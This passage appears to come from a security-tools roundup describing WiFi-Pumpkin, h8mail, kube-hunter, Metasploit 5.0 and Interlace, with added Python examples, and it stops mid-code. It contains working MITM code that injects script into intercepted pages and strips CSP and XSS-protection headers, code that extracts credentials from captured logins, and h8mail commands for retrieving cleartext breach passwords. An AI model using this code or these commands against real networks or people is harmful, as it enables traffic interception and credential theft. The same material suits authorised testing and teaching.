  • If you use a firewall, make sure to accept only traffic coming through the firewall and deny all traffic coming directly from the internet. For example, Cloudflare publishes a list of IP ranges which you can whitelist with iptables or UFW; deny all other traffic.
  • Make sure that no old servers are still accepting connections; they should not be accessible in the first place.
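Turning those two protections into something checkable: the block below is an added example for this page, not part of the script, showing the allow-list in iptables form, an access-log audit that flags clients which reached the origin without passing through the CDN, and a check of the defender's own DNS history for old addresses that still need to be shut down. The CDN_RANGES values (RFC 5737 documentation space), the log lines and all function names are constructed for the example; a real deployment loads the provider's published ranges.

```python
import ipaddress

# Constructed placeholder ranges standing in for the CDN/WAF provider's
# published egress list; load the provider's current list in a real deployment.
CDN_RANGES = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "198.51.100.0/25")]


def is_from_cdn(client_ip, ranges=CDN_RANGES):
    """True if the connecting address belongs to one of the CDN's ranges."""
    addr = ipaddress.ip_address(client_ip)
    return any(addr in net for net in ranges)


def origin_firewall_rules(ranges=CDN_RANGES, ports=(80, 443)):
    """Emit iptables commands that accept web traffic only from the CDN.

    Per port: one ACCEPT per CDN range, then a final DROP for everyone else.
    The UFW equivalent is 'ufw allow from <net> to any port <port>' per range
    followed by 'ufw deny <port>/tcp'.
    """
    rules = []
    for port in ports:
        for net in ranges:
            rules.append(f"iptables -A INPUT -p tcp --dport {port} -s {net} -j ACCEPT")
        rules.append(f"iptables -A INPUT -p tcp --dport {port} -j DROP")
    return rules


def direct_hits(access_log_lines, ranges=CDN_RANGES):
    """Audit an origin's access log (common log format, client address first).

    Any client outside the CDN ranges reached the origin directly, which means
    the allow-list is missing, incomplete or bypassed.
    """
    offenders = []
    for line in access_log_lines:
        client = line.split(" ", 1)[0]
        try:
            if not is_from_cdn(client, ranges):
                offenders.append(client)
        except ValueError:
            continue  # malformed line: skip it rather than abort the audit
    return sorted(set(offenders))


def stale_records(dns_history, current_origin, ranges=CDN_RANGES):
    """From the defender's own DNS history, list A-record addresses that are
    neither the current origin nor a CDN address: each is an old server that
    must be decommissioned or firewalled."""
    return sorted({ip for ip in dns_history if ip != current_origin and not is_from_cdn(ip, ranges)})


# Constructed sample access log lines for the demonstration below.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2019:10:00:00 +0000] "GET / HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2019:10:00:01 +0000] "GET /login HTTP/1.1" 200 734',
    '198.51.100.9 - - [01/Jan/2019:10:00:02 +0000] "GET /about HTTP/1.1" 200 211',
    'not-an-ip - - [01/Jan/2019:10:00:03 +0000] "GET / HTTP/1.1" 400 0',
]

if __name__ == "__main__":
    print("\n".join(origin_firewall_rules()))
    print("direct hits:", direct_hits(SAMPLE_LOG))
    print("stale records:", stale_records(["203.0.113.7", "192.0.2.10", "192.0.2.20"], "192.0.2.10"))
```

A non-empty result from direct_hits() is the signal that the first protection is not in place, and a non-empty result from stale_records() lists exactly the hosts the second protection is about; both checks run from the defender's own data without querying any third-party service.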

Web services used in this script
The following services were used:
  • securitytrails.com
  • certspotter.com

Tags
WAF bypass
Web Application Firewall bypass
DNS History
find direct/origin IP website



WiFi-Pumpkin v0.8.7 - Framework for Rogue Wi-Fi Access Point Attack


WiFi-Pumpkin is a rogue access point framework for creating fake Wi-Fi networks while forwarding legitimate traffic to and from the unsuspecting target. It comes stuffed with features, including rogue Wi-Fi access points, deauth attacks on client APs, a probe request and credentials monitor, transparent proxy, Windows update attack, phishing manager, ARP poisoning, DNS spoofing, Pumpkin-Proxy, and image capture on the fly. The feature list below shows how complete a framework it is for auditing Wi-Fi security.

Installation
  • Python 2.7
 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
./installer.sh --install
or download .deb file to install
sudo dpkg -i wifi-pumpkin-0.8.7-all.deb
sudo apt-get -f install # pull in any dependencies dpkg could not resolve
refer to the wiki for Installation

Features
  • Rogue Wi-Fi Access Point
  • Deauth Attack Clients AP
  • Probe Request Monitor
  • DHCP Starvation Attack
  • Credentials Monitor
  • Transparent Proxy
  • Windows Update Attack
  • Phishing Manager
  • Partial HSTS bypass
  • Support beef hook
  • ARP Poison
  • DNS Spoof
  • Patch Binaries via MITM (BDF-Proxy)
  • LLMNR, NBT-NS and MDNS poisoner (Responder)
  • Pumpkin-Proxy (ProxyServer (mitmproxy API))
  • Capture images on the fly
  • TCP-Proxy (with scapy)
  • Modular plugins and proxies
  • Wireless Mode support hostapd-mana/hostapd-karma attacks

Plugins
  • Dns2proxy: offers several post-exploitation features once the victim's DNS server has been changed to the attacker's.
  • Sslstrip2: Sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks; this is the fork by @LeonardoNve/@xtr4nge.
  • Sergio_proxy: Sergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy written in Python for the Twisted framework.
  • BDFProxy: patches binaries via MITM (BackdoorFactory + mitmProxy); bdfproxy-ng is a fork and review of the original BDFProxy by @secretsquirrel.
  • Responder: an LLMNR, NBT-NS and MDNS poisoner. Author: Laurent Gaffie

Transparent Proxy


A transparent proxy (mitmproxy) that you can use to intercept and manipulate HTTP traffic, modifying requests and responses, which allows JavaScript to be injected into the pages the target visits. You can easily implement a module that injects data into pages: create a Python file in the directory "plugins/extension/" and it will automatically be listed on the Pumpkin-Proxy tab.

Plugins Example Dev
from mitmproxy.models import decoded   # decode gzip/deflate bodies before editing them
from plugins.extension.plugin import PluginTemplate


class Nameplugin(PluginTemplate):
    meta = {
        'Name'        : 'Nameplugin',
        'Version'     : '1.0',
        'Description' : 'Brief description of the new plugin',
        'Author'      : 'by dev'
    }

    def __init__(self):
        for key, value in self.meta.items():
            self.__dict__[key] = value
        # If the plugin needs arguments, see the wiki for ConfigParser usage.
        self.ConfigParser = False   # no arguments required

    def request(self, flow):
        print(flow.__dict__)
        print(flow.request.__dict__)
        print(flow.request.headers.__dict__)        # request headers
        host = flow.request.pretty_host             # domain of the request, on the fly
        versionH = flow.request.http_version        # HTTP version

        # Redirect example: pretty_host takes the "Host" header into account
        if flow.request.pretty_host == "example.org":
            flow.request.host = "mitmproxy.org"

        # Dump every request header to the Pumpkin-Proxy tab
        self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
        for name, value in flow.request.headers.items():
            self.send_output.emit('{}: {}'.format(name, value))

        print(flow.request.method)                  # request method
        # send_output.emit() is how a plugin logs anything to the GUI
        self.send_output.emit('[NamePlugin]:: this is model for save data logging')

    def response(self, flow):
        print(flow.__dict__)
        print(flow.response.__dict__)
        print(flow.response.headers.__dict__)       # response headers as a dict
        print(flow.response.headers['Content-Type'])   # content type

        # Runs on every HTTP response before it is returned to the client
        with decoded(flow.response):
            print(flow.response.content)            # HTML body
            # str.replace() returns a new string: assign it back or nothing changes
            flow.response.content = flow.response.content.replace(
                '</body>', '<h1>injected</h1></body>')

        if "X-XSS-Protection" in flow.response.headers:
            del flow.response.headers["X-XSS-Protection"]   # remove protection header

        flow.response.headers["newheader"] = "foo"  # add a new header;
        # it is added to every response passing through the proxy
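The response-rewriting step of the plugin above, factored into a plain function that can be tested without mitmproxy. This is an added example, not WiFi-Pumpkin's code; rewrite_html_response and the sample headers and body are constructed here. It goes a little beyond the plugin: it only touches text/html bodies, encodes the payload in the page's declared charset, injects once before the last closing body tag whatever its case, drops the headers that would block or report an inline script (X-XSS-Protection and Content-Security-Policy, not just the first), and recomputes Content-Length. mitmproxy recomputes Content-Length itself when you assign flow.response.content; a raw proxy has to do it by hand or the client truncates the page.

```python
import re

BODY_CLOSE_RE = re.compile(rb"</body\s*>", re.IGNORECASE)
CHARSET_RE = re.compile(r"charset=([\w-]+)", re.IGNORECASE)
# Response headers that would block, or report, an injected inline script.
STRIPPED_HEADERS = ("x-xss-protection", "content-security-policy",
                    "content-security-policy-report-only")


def _header(headers, name):
    """Case-insensitive header lookup on a plain dict (name given in lower case)."""
    for key, value in headers.items():
        if key.lower() == name:
            return value
    return None


def rewrite_html_response(headers, body, payload):
    """Inject payload before the last </body> of an HTML response.

    headers: dict of response headers in any case; body: raw bytes with any
    Content-Encoding already removed. Returns (headers, body), unchanged for
    anything that is not HTML or has no closing body tag.
    """
    content_type = _header(headers, "content-type") or ""
    matches = list(BODY_CLOSE_RE.finditer(body))
    if not content_type.lower().startswith("text/html") or not matches:
        return headers, body

    m = CHARSET_RE.search(content_type)
    charset = m.group(1) if m else "utf-8"
    try:
        payload_bytes = payload.encode(charset)
    except LookupError:                  # unknown charset label: best effort
        payload_bytes = payload.encode("utf-8")

    cut = matches[-1].start()
    new_body = body[:cut] + payload_bytes + body[cut:]

    new_headers = {}
    for key, value in headers.items():
        name = key.lower()
        if name in STRIPPED_HEADERS:
            continue
        # The body grew, so a stale Content-Length would truncate the page at the client.
        new_headers[key] = str(len(new_body)) if name == "content-length" else value
    return new_headers, new_body


# Constructed sample response, as a plugin sees it inside mitmproxy's decoded().
SAMPLE_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Length": "38",
    "X-XSS-Protection": "1; mode=block",
    "Content-Security-Policy": "script-src 'self'",
}
SAMPLE_BODY = b"<html><body><p>hello</p></BODY></html>"

if __name__ == "__main__":
    hdrs, page = rewrite_html_response(SAMPLE_HEADERS, SAMPLE_BODY, "<script>alert(1)</script>")
    print(hdrs)
    print(page)
```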

About plugins
plugins on the wiki

TCP-Proxy Server
A proxy that you can place in the middle of a TCP stream. It filters the request and response streams (using the scapy module) and actively modifies packets of a TCP protocol that WiFi-Pumpkin intercepts. The plugin uses modules to view or modify the intercepted data, and a module is about as easy to implement as it gets: add your custom module in "plugins/analyzers/" and it will automatically be listed on the TCP-Proxy tab.
from scapy.all import *
from scapy_http import http            # HTTP layer for scapy
from default import PSniffer           # base plugin class


class ExamplePlugin(PSniffer):
    _activated = False
    _instance = None
    meta = {
        'Name'        : 'Example',
        'Version'     : '1.0',
        'Description' : 'Brief description of the new plugin',
        'Author'      : 'your name',
    }

    def __init__(self):
        for key, value in self.meta.items():
            self.__dict__[key] = value

    @staticmethod
    def getInstance():
        if ExamplePlugin._instance is None:
            ExamplePlugin._instance = ExamplePlugin()
        return ExamplePlugin._instance

    def filterPackets(self, pkt):   # called with each intercepted packet; modify it here
        if pkt.haslayer(http.HTTPRequest):                 # only HTTP requests
            http_layer = pkt.getlayer(http.HTTPRequest)    # HTTP fields as a dict
            ip_layer = pkt.getlayer(IP)                    # IP header fields as a dict

            print(http_layer.fields['Method'])             # HTTP method
            # every header of the request
            for item in http_layer.fields['Headers']:
                print('{} : {}'.format(item, http_layer.fields['Headers'][item]))

            print(ip_layer.fields['src'])                  # source IP address
            print(ip_layer.fields['dst'])                  # destination IP address

            print(http_layer)                              # full layer dump
            print(ip_layer)

            # output.emit() sends a dict to the TCP-Proxy tab
            return self.output.emit({'name_module': 'send output to tab TCP-Proxy'})
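What a TCP-Proxy analyzer does with the bytes it is handed, as an added example that is not part of WiFi-Pumpkin and needs neither scapy nor the PSniffer base class: parse the raw HTTP request a plugin would find in a packet's payload and pull out the form fields that look like credentials (the Credentials Monitor idea). parse_http_request, extract_credentials and the login payload are constructed here. The example also covers what a proxy on a TCP stream has to handle: payloads that are not HTTP at all (TLS records, body fragments) return None, and a POST whose body is shorter than its Content-Length is skipped rather than reported half-parsed.

```python
import re
from urllib.parse import parse_qs

# Form field names that usually carry a credential.
CRED_FIELD_RE = re.compile(r"user|login|email|pass|pwd|token", re.IGNORECASE)


def parse_http_request(payload):
    """Parse one raw HTTP/1.x request out of a TCP payload.

    Returns None when the bytes are not an HTTP request: a TCP proxy sees every
    segment, and most carry TLS records, a body fragment or nothing useful.
    """
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "headers": headers, "body": body}


def extract_credentials(request):
    """Return {field: value} for form fields that look like credentials.

    Only x-www-form-urlencoded POST bodies are inspected, and only when the body
    is complete: a body split across TCP segments needs reassembly first.
    """
    if request is None or request["method"] != "POST":
        return {}
    headers = request["headers"]
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return {}
    declared = headers.get("content-length")
    try:
        if declared is not None and int(declared) != len(request["body"]):
            return {}
    except ValueError:                   # garbage Content-Length: do not trust the body
        return {}
    fields = parse_qs(request["body"].decode("latin-1"), keep_blank_values=True)
    return {name: values[0] for name, values in fields.items() if CRED_FIELD_RE.search(name)}


# Constructed sample payload, what filterPackets would find in pkt[Raw].load.
SAMPLE_LOGIN = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 43\r\n"
    b"\r\n"
    b"username=alice&password=s3cr%21t&remember=1"
)

if __name__ == "__main__":
    req = parse_http_request(SAMPLE_LOGIN)
    print(req["method"], req["headers"]["host"], req["path"])
    print(extract_credentials(req))
```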

About TCP-Proxy
TCP-Proxy on the wiki

Screenshots
Screenshot on the wiki




H8Mail - Email OSINT And Password Breach Hunting

Email OSINT and password finder.
Use h8mail to find passwords through different breach and reconnaissance services, or the infamous "Breach Compilation" torrent.

Features
  • Email pattern matching (reg exp), useful for all those raw HTML files
  • Small and fast Alpine Dockerfile available
  • CLI or Bulk file-reading for targeting
  • Output to CSV file
  • Reverse DNS + Open Ports
  • CloudFlare rate throttling avoidance
    • Execution flow remains synchronous and throttled according to API usage guidelines written by service providers
  • Query and group results from different breach service providers
  • Query a local copy of the "Breach Compilation"
  • Get related emails
  • Delicious colors
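The "email pattern matching" feature, as an added Python example rather than h8mail's own code: pull addresses out of a raw HTML scrape, undo the usual obfuscations, de-duplicate, and group by domain as a first step toward related-email hunting. extract_emails, group_by_domain and the sample page are constructed here. It handles three forms the plain regexp on its own misses: mailto: targets inside tags, HTML-entity-encoded characters such as &#64;, and "[at]"/"[dot]" spelling.

```python
import html
import re

# Obfuscations seen on scraped pages: "user [at] host [dot] com", "user (at) host".
AT_RE = re.compile(r"\s*[\[\(]\s*at\s*[\]\)]\s*", re.IGNORECASE)
DOT_RE = re.compile(r"\s*[\[\(]\s*dot\s*[\]\)]\s*", re.IGNORECASE)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def extract_emails(raw):
    """Return the unique, lower-cased addresses found in raw text or HTML.

    HTML entities are decoded first so "abuse&#64;example&#46;com" is caught.
    Tags are left in place on purpose: mailto: targets live inside them, and
    the quote or angle bracket around them is not a valid address character.
    """
    text = html.unescape(raw)
    text = DOT_RE.sub(".", AT_RE.sub("@", text))
    return sorted({m.group(0).lower() for m in EMAIL_RE.finditer(text)})


def group_by_domain(emails):
    """Group addresses by domain: the starting point for hunting related emails."""
    groups = {}
    for address in emails:
        groups.setdefault(address.rsplit("@", 1)[1], []).append(address)
    return groups


# Constructed sample page with the address forms a scrape typically contains.
SAMPLE_HTML = """
<html><body>
<p>Contact: <a href="mailto:Alice@Example.com">Alice</a></p>
<p>Press: bob [at] example [dot] com</p>
<p>Abuse: abuse&#64;example&#46;com</p>
<p>Partner: carol.smith@partner.example.org (also carol.smith@partner.example.org)</p>
<p>Version 2.0 released at example.com on 2019-01-10</p>
</body></html>
"""

if __name__ == "__main__":
    found = extract_emails(SAMPLE_HTML)
    for domain, addresses in group_by_domain(found).items():
        print(domain, addresses)
```

The bare word "at" is deliberately not rewritten ("released at example.com" would otherwise become a false address); only the bracketed forms are.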

Demos

Out of the box


With API services


With the BreachedCompilation torrent



APIs
Service                          Functions                                     Status
HaveIBeenPwned                   Number of email breaches                      Yes
Shodan                           Reverse DNS, open ports                       Yes
Hunter.io - Public               Number of related emails                      Yes
Hunter.io - Service (free tier)  Cleartext related emails                      Yes
WeLeakInfo - Public              Number of searchable breach results           Soon
WeLeakInfo - Service             Cleartext passwords, hashes and salts         Soon
Snusbase - Service               Cleartext passwords, hashes and salts (fast)  Yes

Install
If you're using Docker, make sure to add your targets.txt and your API keys in the configuration file before building

Locally
NodeJS is required to ensure CloudFlare bypassing. You can find out how to install it for your distribution here
These instructions assume you are running Python3 as default. If unsure, please check the troubleshooting section
apt-get install nodejs
git clone https://github.com/khast3x/h8mail.git
cd h8mail
pip install -r requirements.txt
python h8mail.py -h

Docker
git clone https://github.com/khast3x/h8mail.git
cd h8mail
docker build -t h8mail .
docker run -ti h8mail -h

Usage
> python h8mail.py --help
usage: h8mail.py [-h] -t TARGET_EMAILS [-c CONFIG_FILE] [-o OUTPUT_FILE]
[-bc BC_PATH] [-v] [-l] [-k CLI_APIKEYS]

Email information and password finding tool

optional arguments:
-h, --help show this help message and exit
-t TARGET_EMAILS, --targets TARGET_EMAILS
Either single email, or file (one email per line).
REGEXP
-c CONFIG_FILE, --config CONFIG_FILE
Configuration file for API keys
-o OUTPUT_FILE, --output OUTPUT_FILE
File to write output
-bc BC_PATH, --breachcomp BC_PATH
Path to the breachcompilation Torrent.
https://ghostbin.com/paste/2cbdn
-v, --verbose Show debug information
-l, --local Run local actions only
-k CLI_APIKEYS, --apikey CLI_APIKEYS
Pass config options. Format is "K:V,K:V"

Usage examples

Query for a single target
python h8mail.py -t target@example.com

Query for list of targets, indicate config file for API keys, output to pwned_targets.csv
python h8mail.py -t targets.txt -c config.ini -o pwned_targets.csv

Query a list of targets against local copy of the Breach Compilation, pass API keys for Snusbase from the command line
python h8mail.py -t targets.txt -bc ../Downloads/BreachCompilation/ -k "snusbase_url:$snusbase_url,snusbase_token:$snusbase_token"

Query without making API calls against local copy of the Breach Compilation
python h8mail.py -t targets.txt -bc ../Downloads/BreachCompilation/ --local

Troubleshooting

Python version & Kali
The above instructions assume you are running python3 as default. If unsure, type:
python --version
in your terminal. It should be either Python 3.* or Python 2.*.
If you are running python2 as default :
Make sure you have python3 installed, then replace python commands with explicit python3 calls:
apt-get install nodejs
git clone https://github.com/khast3x/h8mail.git
cd h8mail
pip3 install -r requirements.txt
python3 h8mail.py -h


Kube-Hunter - Hunt For Security Weaknesses In Kubernetes Clusters


Kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. You should NOT run kube-hunter on a Kubernetes cluster you don't own!
Run kube-hunter: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at kube-hunter.aquasec.com where you can register online to receive a token allowing you to see and share the results online. You can also run the Python code yourself as described below.
Contribute: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your own modules please read Guidelines For Developing Your First kube-hunter Module.

Hunting

Where should I run kube-hunter?
Run kube-hunter on any machine (including your laptop), select Remote scanning and give the IP address or domain name of your Kubernetes cluster. This will give you an attacker's-eye view of your Kubernetes setup.
You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.
You can also run kube-hunter in a pod within the cluster. This gives an indication of how exposed your cluster would be in the event that one of your application pods is compromised (through a software vulnerability, for example).

Scanning options
By default, kube-hunter will open an interactive session, in which you will be able to select one of the following scan options. You can also specify the scan option manually from the command line. These are your options:
  1. Remote scanning To specify remote machines for hunting, select option 1 or use the --remote option. Example: ./kube-hunter.py --remote some.node.com
  2. Internal scanning To specify internal scanning, you can use the --internal option. (this will scan all of the machine's network interfaces) Example: ./kube-hunter.py --internal
  3. Network scanning To specify a specific CIDR to scan, use the --cidr option. Example: ./kube-hunter.py --cidr 192.168.0.0/24

Active Hunting
Active hunting is an option in which kube-hunter will exploit vulnerabilities it finds, in order to explore for further vulnerabilities. The main difference between normal and active hunting is that a normal hunt will never change state of the cluster, while active hunting can potentially do state-changing operations on the cluster, which could be harmful.
By default, kube-hunter does not do active hunting. To active hunt a cluster, use the --active flag. Example: ./kube-hunter.py --remote some.domain.com --active
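The difference between the scanning options and between passive and active hunting, as an added Python example that is not kube-hunter's code: probe the default Kubernetes ports on one node (the API server, both kubelet ports and etcd, which are among the services kube-hunter's own hunters look at), classify the answers, and never change cluster state. The function names hunt, http_get and pod_context, the PROBES table and the sample answers are constructed here; the HTTP getter is injectable so the classification can be run offline. pod_context shows what the "run in a pod" option starts from: the service-account token every pod gets mounted.

```python
import ssl
import urllib.error
import urllib.request

# Default Kubernetes ports and the unauthenticated paths a passive hunt tries.
PROBES = [
    (6443,  "/api",     "API server answers anonymous requests"),
    (10250, "/pods",    "kubelet secure port serves /pods without authentication"),
    (10255, "/pods",    "kubelet read-only port is exposed"),
    (2379,  "/version", "etcd client port answers without a client certificate"),
]


def http_get(host, port, path, timeout=3):
    """GET path over HTTPS, then HTTP, without certificate checks.

    Returns (status, body); (None, "") when nothing on that port speaks HTTP.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE    # cluster components use internal CAs
    for scheme in ("https", "http"):
        url = f"{scheme}://{host}:{port}{path}"
        try:
            with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:       # 401/403 are answers too
            return err.code, err.read().decode("utf-8", "replace")
        except (urllib.error.URLError, OSError):    # closed port or wrong scheme
            continue
    return None, ""


def hunt(host, get=http_get):
    """Passive hunt against one node: probe, classify, never change state.

    An active hunt (--active) would go further, e.g. use a kubelet that answers
    /pods to run commands inside pods; this function stops at reading endpoints.
    """
    findings = []
    for port, path, description in PROBES:
        status, _body = get(host, port, path)
        if status is None:
            continue
        finding = {"port": port, "path": path, "status": status}
        if status == 200:
            finding.update(severity="high", finding=description)
        elif status in (401, 403):
            finding.update(severity="info", finding="service reachable, authentication required")
        else:
            finding.update(severity="info", finding=f"unexpected status {status}")
        findings.append(finding)
    return findings


def pod_context(base="/var/run/secrets/kubernetes.io/serviceaccount"):
    """What a compromised pod already holds: the mounted service-account token.

    Returns None when not running inside a pod.
    """
    try:
        with open(f"{base}/token") as fh:
            token = fh.read().strip()
        with open(f"{base}/namespace") as fh:
            namespace = fh.read().strip()
    except OSError:
        return None
    return {"namespace": namespace, "token_present": bool(token)}


# Constructed sample answers standing in for a real node, so the code runs offline.
SAMPLE_ANSWERS = {
    (6443, "/api"):   (403, '{"kind":"Status","reason":"Forbidden"}'),
    (10255, "/pods"): (200, '{"kind":"PodList","items":[]}'),
}


def sample_get(host, port, path, timeout=3):
    return SAMPLE_ANSWERS.get((port, path), (None, ""))


if __name__ == "__main__":
    for f in hunt("10.0.0.5", get=sample_get):
        print(f"{f['severity']:5} :{f['port']}{f['path']} -> {f['status']}  {f['finding']}")
    print("inside a pod:", pod_context())
```

Replace sample_get with the default http_get to probe a real node you own; the --cidr option corresponds to calling hunt once per address in the range.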

List of tests
You can see the list of tests with the --list option: Example: ./kube-hunter.py --list
To see active hunting tests as well as passive: ./kube-hunter.py --list --active

Output
To control logging, you can specify a log level, using the --log option. Example: ./kube-hunter.py --active --log WARNING Available log levels are:
  • DEBUG
  • INFO (default)
  • WARNING
To see only a mapping of your nodes network, run with --mapping option. Example: ./kube-hunter.py --cidr 192.168.0.0/24 --mapping This will output all the Kubernetes nodes kube-hunter has found.

Deployment
There are three methods for deploying kube-hunter:

On Machine
You can run the kube-hunter python code directly on your machine.

Prerequisites
You will need the following installed:
  • python 2.7
  • pip
Clone the repository:
git clone git@github.com:aquasecurity/kube-hunter.git
Install module dependencies:
cd ./kube-hunter
pip install -r requirements.txt

In the case where you have python 3.x in the path as your default, and python2 refers to a python 2.7 executable, use "python2 -m pip install -r requirements.txt"
Run: ./kube-hunter.py

Container
Aqua Security maintains a containerised version of kube-hunter at aquasec/kube-hunter. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at kube-hunter.aquasec.com. Please note that running the aquasec/kube-hunter container and uploading reports data are subject to additional terms and conditions.
The Dockerfile in this repository allows you to build a containerised version without the reporting plugin.
If you run the kube-hunter container with the host network it will be able to probe all the interfaces on the host:
docker run -it --rm --network host aquasec/kube-hunter
Note for Docker for Mac/Windows: Be aware that the "host" for Docker for Mac or Windows is the VM which Docker runs containers within. Therefore specifying --network host allows kube-hunter access to the network interfaces of that VM, rather than those of your machine. By default kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above e.g.
docker run --rm aquasec/kube-hunter --cidr 192.168.0.0/24

Pod
This option lets you discover what running a malicious container can do/discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.
The job.yaml file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings.
  • Run the job with kubectl create -f job.yaml
  • Find the pod name with kubectl describe job kube-hunter
  • View the test results with kubectl logs <pod name>


Metasploit 5.0 - The World’s Most Used Penetration Testing Framework


Knowledge is power, especially when it’s shared. A collaboration between the open source community and Rapid7, Metasploit helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.

Rapid7 has announced the release of Metasploit 5.0. The new version includes several important new features and, the company believes, is easier to use and more powerful.

Metasploit is the most widely used penetration testing framework. It has more than 1500 modules that deliver functionality covering every phase of a penetration test, making the life of a penetration tester comparatively easier.

The most important changes in Metasploit 5.0 are new database and automation APIs, evasion modules and libraries, language support and improved performance.

Metasploit 5.0 is currently available from its official GitHub project. Rapid7 says it is in the process of informing third-party developers that Metasploit 5.0 is stable; Linux distributions such as Kali and ParrotSec ship with Metasploit.

Metasploit 5.0 Release Notes

Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.

The following is a high-level overview of Metasploit 5.0’s features and capabilities.

  • Metasploit users can now run the PostgreSQL database by itself as a RESTful service, which allows for multiple Metasploit consoles and external tools to interact with it.
  • Parallel processing of the database and regular msfconsole operations improves performance by offloading some bulk operations to the database service.
  • A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.
  • This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services here.
  • Adds evasion module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules here. Rapid7’s first evasion modules are here.
  • The metashell feature allows users to run background sessions and interact with shell sessions without needing to upgrade to a Meterpreter session.
  • External modules add Metasploit support for Python and Go in addition to Ruby.
  • Any module can target multiple hosts by setting RHOSTS to a range of IPs, or by referencing a hosts file with the file:// option. Metasploit now treats RHOST and RHOSTS as identical options.
  • An updated search mechanism improves Framework start time and removes database dependency.


Interlace - Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support


Easily turn single threaded command line applications into fast, multi threaded application with CIDR and glob support.

Setup
Install using:
$ python3 setup.py install
Dependencies will then be installed and Interlace will be added to your path as interlace.

Usage
  • -t: Specify a target or domain name either in comma format, CIDR notation, or as an individual host.
  • -tL: Specify a list of targets or domain names
  • -threads: Specify the maximum number of threads to run at any one time (DEFAULT: 5)
  • -timeout: Specify a timeout value in seconds for any one thread (DEFAULT: 600)
  • -c: Specify a single command to execute over each target or domain
  • -cL: Specify a list of commands to execute over each target or domain
  • -o: Specify an output folder variable that can be used in commands as _output_
  • -p: Specify a list of port variable that can be used in commands as _port_. This can be a single port, a comma delimited list, or use dash notation
  • -rp: Specify a real port variable that can be used in commands as _realport_
  • --no-cidr: If set then CIDR notation in a target file will not be automatically expanded into individual hosts.
  • --no-color: If set then any foreground or background colours will be stripped out
  • --silent: If set then only important information will be displayed and banners and other information will be redacted.
  • -v: If set then verbose output will be displayed in the terminal

Further information regarding ports (-p)
  • 80: single port
  • 1-80: dash notation, perform a command for each port from 1 to 80
  • 80,443: perform a command for both port 80 and port 443

Further information regarding targets (-t or -tL)
Both -t and -tL will be processed the same. You can pass targets the same as you would when using nmap. This can be done using CIDR notation, dash notation, or a comma delimited list of targets. A single target list file can also use different notation types per line.

Variable Replacements
The following variables will be replaced in commands at runtime:
  • _target_: replaced with the expanded target that the current thread is running against
  • _host_: works the same as _target_; the two can be used interchangeably
  • _output_: replaced with the output folder variable from interlace
  • _port_: replaced with the expanded port variable from interlace
  • _realport_: replaced with the real port variable from interlace
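The expansion and substitution described in the three sections above, as an added Python example (it is not Interlace's own code): CIDR, dash, glob and comma targets are expanded into hosts, port specs into ints, the placeholders are substituted into each command template, and the resulting queue is run on a bounded thread pool with a per-command timeout, which is the shape of what Interlace does with -t/-tL, -p, -c/-cL, -threads and -timeout. The names expand_target, expand_ports, render, build_commands and run_all are chosen here. Dash and glob expansion are limited to the last octet in this example.

```python
import ipaddress
import re
import subprocess
from concurrent.futures import ThreadPoolExecutor

RANGE_RE = re.compile(r"^(\d+\.\d+\.\d+\.)(\d+)-(\d+)$")   # 192.168.1.10-20
GLOB_RE = re.compile(r"^(\d+\.\d+\.\d+\.)\*$")              # 192.168.1.*


def expand_target(spec):
    """Expand one target spec (comma list, CIDR, last-octet dash range,
    last-octet glob, or plain host) into individual hosts, in order."""
    if "," in spec:
        return [h for part in spec.split(",") for h in expand_target(part.strip())]
    if "/" in spec:
        return [str(ip) for ip in ipaddress.ip_network(spec, strict=False).hosts()]
    m = RANGE_RE.match(spec)
    if m:
        prefix, lo, hi = m.group(1), int(m.group(2)), int(m.group(3))
        return [f"{prefix}{i}" for i in range(lo, hi + 1)]
    m = GLOB_RE.match(spec)
    if m:
        return [f"{m.group(1)}{i}" for i in range(1, 255)]
    return [spec]


def expand_ports(spec):
    """'80', '80,443' or '1-80' -> list of ints."""
    ports = []
    for part in spec.split(","):
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            ports.extend(range(lo, hi + 1))
        elif part:
            ports.append(int(part))
    return ports


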